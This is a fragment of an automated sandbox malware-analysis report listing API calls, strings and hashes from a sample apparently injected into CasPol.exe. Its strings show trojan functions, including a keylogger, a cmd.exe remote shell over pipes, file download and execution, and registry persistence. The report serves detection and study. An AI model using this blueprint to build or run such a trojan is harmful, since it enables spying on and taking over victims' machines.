                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValue
                                                                                            • String ID: HgF$pth_unenc
                                                                                            • API String ID: 1818849710-3662775637
                                                                                            • Opcode ID: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                                            • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                            • Opcode Fuzzy Hash: 527e28f3b051cf4da2b25fb1b82031e69a8b63d3ddd468a42223c023ca7a807e
                                                                                            • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread$LocalTimewsprintf
                                                                                            • String ID: Offline Keylogger Started
                                                                                            • API String ID: 465354869-4114347211
                                                                                            • Opcode ID: aa7dad158495ae52b0f3a751208c625103e585d813ac465631ead48c5b0ce597
                                                                                            • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                            • Opcode Fuzzy Hash: aa7dad158495ae52b0f3a751208c625103e585d813ac465631ead48c5b0ce597
                                                                                            • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                            APIs
                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                            • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValue
                                                                                            • String ID: TUF
                                                                                            • API String ID: 1818849710-3431404234
                                                                                            • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                            • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                            • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                            • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                            • CloseHandle.KERNELBASE(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3604237281-0
                                                                                            • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                            • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                            • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                            • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                            APIs
                                                                                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                            • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastMutex
                                                                                            • String ID: (CG
                                                                                            • API String ID: 1925916568-4210230975
                                                                                            • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                            • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                            • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                            • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                            APIs
                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                            • RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3677997916-0
                                                                                            • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                            • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                            • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                            • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                            APIs
                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3677997916-0
                                                                                            • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                            • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                            • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                            • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                            APIs
                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3677997916-0
                                                                                            • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                            • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                            • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                            • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: xAG
                                                                                            • API String ID: 176396367-2759412365
                                                                                            • Opcode ID: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                            • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                            • Opcode Fuzzy Hash: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                            • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 0044B9DF
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap$_free
                                                                                            • String ID:
                                                                                            • API String ID: 1482568997-0
                                                                                            • Opcode ID: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                                                                            • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                            • Opcode Fuzzy Hash: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                                                                            • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                            APIs
                                                                                            • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                              • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateEventStartupsocket
                                                                                            • String ID:
                                                                                            • API String ID: 1953588214-0
                                                                                            • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                            • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                            • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                            • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                            APIs
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                              • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                            • String ID:
                                                                                            • API String ID: 3476068407-0
                                                                                            • Opcode ID: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                                                            • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                            • Opcode Fuzzy Hash: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                                                            • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                            APIs
                                                                                            • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                              • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                              • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                              • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                              • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                              • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                            • String ID:
                                                                                            • API String ID: 1170566393-0
                                                                                            • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                            • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                            • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                            • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                            • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                            • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                            • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                            APIs
                                                                                            • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Startup
                                                                                            • String ID:
                                                                                            • API String ID: 724789610-0
                                                                                            • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                            • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                            • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                            • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: recv
                                                                                            • String ID:
                                                                                            • API String ID: 1507349165-0
                                                                                            • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                            • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                            • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                            • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: send
                                                                                            • String ID:
                                                                                            • API String ID: 2809346765-0
                                                                                            • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                            • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                            • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                            • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                            APIs
                                                                                            • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                              • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                              • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                              • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                              • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                              • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                              • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                              • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                            • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                              • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                              • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                              • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                            • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                              • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                            • API String ID: 2918587301-599666313
                                                                                            • Opcode ID: ae1ce5c7583d2e0f4159f2413a5c2e8f41abb5c6151e42dc36fffbf63599438c
                                                                                            • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                            • Opcode Fuzzy Hash: ae1ce5c7583d2e0f4159f2413a5c2e8f41abb5c6151e42dc36fffbf63599438c
                                                                                            • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                            APIs
                                                                                            • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                            • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                            • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                            • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                            • CloseHandle.KERNEL32 ref: 004053CD
                                                                                            • CloseHandle.KERNEL32 ref: 004053D5
                                                                                            • CloseHandle.KERNEL32 ref: 004053E7
                                                                                            • CloseHandle.KERNEL32 ref: 004053EF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                            • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                            • API String ID: 3815868655-81343324
                                                                                            • Opcode ID: 04ba8fd0531e554fcf84a0a5055e6f0d52085a2b4c4a0f42a3f9ebc49000daac
                                                                                            • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                            • Opcode Fuzzy Hash: 04ba8fd0531e554fcf84a0a5055e6f0d52085a2b4c4a0f42a3f9ebc49000daac
                                                                                            • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
